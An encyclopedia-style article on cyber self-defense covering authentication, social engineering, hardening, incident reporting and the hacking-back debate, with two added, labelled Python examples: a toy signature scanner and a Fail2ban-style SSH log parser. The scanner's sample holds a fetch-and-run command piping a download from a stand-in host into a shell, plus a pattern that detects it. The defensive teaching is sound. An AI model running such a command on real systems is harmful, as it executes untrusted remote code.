Cyber self-defense

In cybersecurity, cyber self-defense refers to self-defense against cyberattack. While it generally emphasizes active cybersecurity measures by computer users themselves, cyber self-defense is sometimes used to refer to the self-defense of organizations as a whole, such as corporate entities or entire nations. Surveillance self-defense is a variant of cyber self-defense and largely overlaps with it. Active and passive cybersecurity measures provide defenders with higher levels of cybersecurity, intrusion detection, incident handling and remediation capabilities. Various sectors and organizations are legally obligated to adhere to cybersecurity standards.

Background
Organizations may conduct a penetration test with an internal team or hire a third-party organization to audit the organization's systems. Larger organizations may conduct internal attacker-defender scenarios with a "red team" attacking and a "blue team" defending. The defenders, namely threat hunters, system administrators, and programmers, proactively manage information systems, remediate vulnerabilities, gather cyber threat intelligence, and harden their operating systems, code, connected devices, and networks. Blue teams may include all information and physical security personnel employed by the organization. Physical security may be tested for weaknesses, and all employees may be the target of social engineering attacks and IT security audits. Digital and physical systems may be audited with varying degrees of knowledge of the relevant systems to simulate realistic conditions for attackers and for employees, who are frequently trained in security practices and measures. In full-knowledge test scenarios, known as white box tests, the attacking party knows all available information regarding the client's systems. In black box tests, the attacking party is provided with no information regarding the client's systems. Gray box tests provide limited information to the attacking party.

Cybersecurity researcher Jeffrey Carr compares cyber self-defense to martial arts as one's computer and network attack surface may be shrunk to reduce the risk of exploitation.

Authentication

 * Enable multi-factor authentication.
 * Minimize authentication risk by limiting the number of people who know one's authentication factors, the three common ones being "something you are, something you know, and something you have." Such unique information is valuable to a threat actor seeking unauthorized access to a person's accounts or information.
 * Reduce one's social media footprint to mitigate risk profile.
 * Regularly check one's social media security and privacy settings.
 * Create strong and unique passwords for each user account and change passwords frequently and after any security incident.
 * Use a password manager to avoid storing passwords in physical form. This incurs a greater software risk profile due to potential vulnerabilities in the password management software, but mitigates the risk of a breach if a written password list were stolen or lost, and in the case that a keylogger is present on the machine.
 * Pay attention to what information one might accidentally reveal in online posts.
 * Change default passwords to programs and services to prevent default credential vulnerability exploitation techniques.
 * Appropriately use password brute-force attack prevention software such as Fail2ban or an effective equivalent.
 * Never give out logins or passwords to anyone unless absolutely necessary and if so, change them immediately thereafter.
 * Use security questions and answers that are impossible for anybody else to answer even if they have access to one's social media posts or engage in social engineering.

Anti-social engineering measures

 * Do not plug in found external storage devices, such as external hard drives, USB flash drives, and other digital media.
 * Beware of social engineering techniques and the six key principles of influence: reciprocity, commitment and consistency, social proof, authority, liking, and scarcity.
 * Beware of shoulder surfing, wherein threat actors collect passwords and authentication information by physically observing the target user.
 * Beware of piggybacking (tailgating), wherein a threat actor closely follows an authorized person into a secure facility.
 * Beware of wardriving, wherein threat actors use mobile hacking stations to gain unauthorized access to WiFi. Wardriving might also consist of the use of parabolic microphones to gather acoustic data, such as passwords and personally identifiable data.
 * Be cautious when browsing and when opening email attachments or links in emails, which may be phishing attempts.
 * Refrain from interacting with fake phone calls (voice phishing, also known as "vishing").
 * Check suspicious links with Google Transparency Report to see whether the site is known to host malware.

Preventative software measures

 * Use, but do not rely solely on, antivirus software, as evading it is trivial for threat actors. This is due to its reliance on an easily altered digital signature, a form of applied hash, of the previously known malicious code.
 * Use an antimalware product, such as Malwarebytes Anti-Malware, in conjunction with an antivirus with vulnerability scanning features.
 * Update and upgrade all of one's software and programs, including, but not limited to, the operating system, firmware, software drivers, and device drivers. Use dedicated update software and enable automatic update features.
 * Encrypt one's computer and phone.
 * Regularly create backups of one's data.
 * Uninstall insecure software such as Adobe Flash from one's operating system, and refrain from loading such plugins within one's web browser or visiting web pages that depend on them.
 * Only run software when necessary to reduce attack surface.
 * Refrain from rooting one's phone or internet-facing device.
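As an added illustration, not taken from the original article, of why the list above treats antivirus as necessary but not sufficient: a toy scanner that combines an exact SHA-256 hash list with a behaviour-oriented byte pattern (a simplified form of what YARA-style rules express), run over constructed shell-script samples. The samples, the signature names and the `scan` function are assumptions made for this example.

```python
import hashlib
import re

# Constructed samples standing in for files on disk (not real malware).
KNOWN_BAD = b"#!/bin/sh\ncurl http://example.invalid/drop | sh\n"
VARIANT = KNOWN_BAD.replace(b"curl ", b"curl  ")  # one extra byte, same behaviour
BENIGN = b"#!/bin/sh\necho hello\n"

# Hash signatures identify only the exact bytes of a previously seen sample.
HASH_SIGS = {hashlib.sha256(KNOWN_BAD).hexdigest(): "dropper.sh"}

# Pattern signatures describe behaviour ("download piped straight into a shell"),
# so they survive trivial edits that change the file's hash.
PATTERN_SIGS = {"pipe_download_to_shell": re.compile(rb"curl\s+\S+\s*\|\s*sh")}


def scan(data: bytes) -> dict:
    """Return the hash-signature name (or None) and the pattern names that fired."""
    hits = {"hash": None, "pattern": []}
    digest = hashlib.sha256(data).hexdigest()
    hits["hash"] = HASH_SIGS.get(digest)
    for name, rx in PATTERN_SIGS.items():
        if rx.search(data):
            hits["pattern"].append(name)
    return hits


def verdicts() -> dict:
    """Scan the three constructed samples; the variant is missed by hash only."""
    return {"known": scan(KNOWN_BAD), "variant": scan(VARIANT), "benign": scan(BENIGN)}
```

The point for a defender is the middle row: the hash list alone gives the variant a clean bill of health, which is why the list pairs antivirus with other controls.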

Network and information security measures

 * Using a firewall on Internet-connected devices.
 * Not running programs, services, or browsers with a super-user or privileged user account, such as root (Linux and Unix) or Administrator (Windows), unless one understands the security risks of such an action.
 * Avoiding free WiFi and not logging into any accounts while using it.
 * Appropriately using privacy and anonymity software such as the Tor anonymity network for anonymous web browsing, given that this attracts some attention.
 * Appropriately using HTTP and various Internet Protocol proxies and security measures, such as disabling HTTP header fields, filtering, and relaying traffic through proxy servers and protocols such as Squid Proxy, proxychains, SOCKS4, and SOCKS5.
 * Publishing public keys for PGP authentication for being able to prove one's identity.
 * Using the strongest encryption method one's router offers and updating router firmware.
 * Using an intrusion detection system (IDS) or a SIEM (security information and event management system) to alert on indicators of compromise, such as configuration changes in the operating system, privilege escalation, network security breaches, and unauthorized remote logins.
 * Using a demilitarized zone to reduce the number of systems and services openly facing the internet.
 * Using a virtual private network with IPsec to secure traffic at the transport layer of the OSI model to harden the IP stack.
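The following is an added example, not code from the article or from the Fail2ban project, showing the mechanism behind two items above: the brute-force prevention that Fail2ban performs (authentication list) and the IDS/SIEM alerting on unauthorized remote logins (this list). It parses a constructed OpenSSH auth-log excerpt and bans a source after MAXRETRY failures within FINDTIME seconds, mirroring Fail2ban's stock defaults of 5 failures in 10 minutes; the log lines, host names and IP addresses are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

MAXRETRY, FINDTIME = 5, 600  # ban after 5 failures within 600 s (Fail2ban's defaults)

# Failed-password line as OpenSSH writes it to the auth log (syslog format, no year).
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+) port \d+"
)


def parse_ts(ts, year=2024):
    """Syslog timestamps omit the year; assume one so they can be compared."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S").timestamp()


def find_bans(lines):
    """Return {ip: timestamp of the failure that triggered the ban}."""
    recent = defaultdict(deque)  # ip -> timestamps of failures inside the window
    banned = {}
    for line in lines:
        m = FAIL_RE.match(line)
        if not m or m["ip"] in banned:
            continue  # successful logins and other lines are not counted
        ip, t = m["ip"], parse_ts(m["ts"])
        window = recent[ip]
        window.append(t)
        while t - window[0] > FINDTIME:  # drop failures older than FINDTIME
            window.popleft()
        if len(window) >= MAXRETRY:
            banned[ip] = m["ts"]
    return banned


# Constructed excerpt: one source hammering within seconds, another failing slowly.
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 50122 ssh2
Mar  3 10:00:03 host sshd[1203]: Failed password for root from 203.0.113.5 port 50124 ssh2
Mar  3 10:00:05 host sshd[1205]: Failed password for root from 203.0.113.5 port 50126 ssh2
Mar  3 10:00:07 host sshd[1207]: Failed password for invalid user test from 203.0.113.5 port 50128 ssh2
Mar  3 10:00:09 host sshd[1209]: Failed password for root from 203.0.113.5 port 50130 ssh2
Mar  3 10:00:11 host sshd[1211]: Accepted publickey for alice from 198.51.100.7 port 40000 ssh2
Mar  3 10:01:00 host sshd[1213]: Failed password for bob from 198.51.100.7 port 40002 ssh2
Mar  3 10:12:00 host sshd[1215]: Failed password for bob from 198.51.100.7 port 40004 ssh2
Mar  3 10:23:00 host sshd[1217]: Failed password for bob from 198.51.100.7 port 40006 ssh2
"""
```

The slow source never accumulates five failures inside one ten-minute window and is left alone, which is the trade-off any such threshold makes between catching bursts and tolerating a user who occasionally mistypes a password.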

Reporting breaches and incidents

 * Gather evidence and document security and data breaches (intrusions).
 * Contact relevant authorities, administrators or organizations in the case of a cyberattack.
 * Beware of website data breaches wherein stored passwords and personally identifiable information are publicized.
 * Refer to a state's statute on security breach notification laws.

"Hacking back"
Legal theorists and policy makers are increasingly considering authorizing the private sector to take active measures by "hacking back" (also known as hackbacks). In contrast to active attack measures, passive defense measures present a reduced risk of cyberwarfare and of legal, political, and economic fallout.

A contemporary topic in debate and research is the question of 'when does a cyber-attack, or the threat thereof, give rise to a right of self-defense?'

In March 2017, Tom Graves proposed the Active Cyber Defense Certainty Act (ACDC) that would enhance the Computer Fraud and Abuse Act (CFAA) to allow individuals and the private sector to use certain tools currently restricted under the CFAA to identify attackers and prevent attacks by hacking them. This presents a "chicken or the egg" problem, wherein if everyone were allowed to hack anyone, then everyone would hack everyone and only the most skilled and resourced would remain. Brad Maryman warns of unintended consequences, stating that in his view "the notion that we should legislate and accept a level of undocumented and unmonitored cyber actions by anyone who thinks they have been hacked is unfathomable".